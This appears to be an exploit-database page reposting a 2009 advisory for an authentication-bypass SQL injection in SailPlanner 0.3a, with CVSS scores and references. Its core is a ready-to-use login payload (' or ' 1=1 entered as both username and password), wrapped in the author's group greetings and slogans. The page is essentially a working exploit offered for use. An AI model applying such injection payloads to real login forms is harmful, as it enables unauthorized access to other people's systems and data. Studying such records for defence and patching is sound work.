SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability

2009.08.27
Credit: jiko
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------- -- JIKO FroM No-exploit.Com --- ------------------------------------------------------------------------- # Author : jiko # email : jalikom@hotmail.com # Home : www.no-exploit.Com # Script : http://relative.nl/projects.php?subMnuItem=1 =========================JIkI Team=================== # Exploit : http://no-exploit.com real name of admin or ember Username : demo1 ' or ' 1=1 Password : demo1 ' or ' 1=1 or JIKO or any thing ex: Username : demo1 ' or ' 1=1 Password : demo1 ' or ' 1=1 or JIKO or any thing =========================JIKI Team=================== greetz : all my friend and all No-exploit members and $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR all muslims visit: ==> www.no-exploit.Com Visit: My-montada.Co.cc For your free Forum ------------------------------------------------------------------------- -- JIKI Team [ JIKO + KIl1er ] -- ------------------------------------------------------------------------- ------== troops of Mohamed comming inchalah =----------------- Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc ++-----------+ ++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ +------------++

References:

http://xforce.iss.net/xforce/xfdb/46932
http://www.securityfocus.com/bid/32521
http://www.milw0rm.com/exploits/7267
http://www.juniper.net/security/auto/vulnerabilities/vuln32521.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top